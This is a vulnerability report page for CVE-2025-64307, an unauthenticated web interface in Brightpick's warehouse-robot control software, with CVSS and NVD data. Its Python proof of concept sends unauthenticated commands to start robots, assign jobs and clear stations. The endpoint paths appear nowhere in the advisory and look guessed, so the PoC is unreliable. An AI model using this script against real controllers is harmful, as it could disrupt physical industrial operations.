Security Vulnerability Report
中文
CVE-2025-64307 CVSS 6.5 MEDIUM

CVE-2025-64307

Published: 2025-11-15 00:15:48
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Brightpick Internal Logic Control web interface is accessible without requiring user authentication. An unauthorized user could exploit this interface to manipulate robot control functions, including initiating or halting runners, assigning jobs, clearing stations, and deploying storage totes.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Brightpick Internal Logic Control (ILC) - 所有未修复版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-64307 PoC - Brightpick ILC Unauthenticated Access # Target: Brightpick Internal Logic Control web interface TARGET_IP = "192.168.1.100" TARGET_PORT = 8080 BASE_URL = f"http://{TARGET_IP}:{TARGET_PORT}" def start_runner(runner_id): """Start a specific runner unit""" endpoint = f"{BASE_URL}/api/control/runner/start" payload = {"runner_id": runner_id} response = requests.post(endpoint, json=payload) return response.json() def stop_runner(runner_id): """Stop a specific runner unit""" endpoint = f"{BASE_URL}/api/control/runner/stop" payload = {"runner_id": runner_id} response = requests.post(endpoint, json=payload) return response.json() def assign_job(job_id, station_id): """Assign a job to a station""" endpoint = f"{BASE_URL}/api/scheduler/job/assign" payload = {"job_id": job_id, "station_id": station_id} response = requests.post(endpoint, json=payload) return response.json() def clear_station(station_id): """Clear all data from a station""" endpoint = f"{BASE_URL}/api/station/clear" payload = {"station_id": station_id} response = requests.post(endpoint, json=payload) return response.json() def deploy_tote(tote_id, location): """Deploy storage tote to specified location""" endpoint = f"{BASE_URL}/api/storage/deploy" payload = {"tote_id": tote_id, "location": location} response = requests.post(endpoint, json=payload) return response.json() # Example: Exploit the vulnerability if __name__ == "__main__": print("[+] Testing CVE-2025-64307 - Unauthenticated access") # No authentication required - directly call control APIs result = start_runner("runner_001") print(f"[+] Start runner result: {result}") result = assign_job("job_500", "station_A1") print(f"[+] Assign job result: {result}") result = clear_station("station_B2") print(f"[+] Clear station result: {result}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64307", "sourceIdentifier": "[email protected]", "published": "2025-11-15T00:15:47.700", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Brightpick Internal Logic Control web interface is accessible \nwithout requiring user authentication. An unauthorized user could \nexploit this interface to manipulate robot control functions, including \ninitiating or halting runners, assigning jobs, clearing stations, and \ndeploying storage totes."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://brightpick.ai/contact-us/", "source": "[email protected]"}, {"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-317-04.json", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-317-04", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.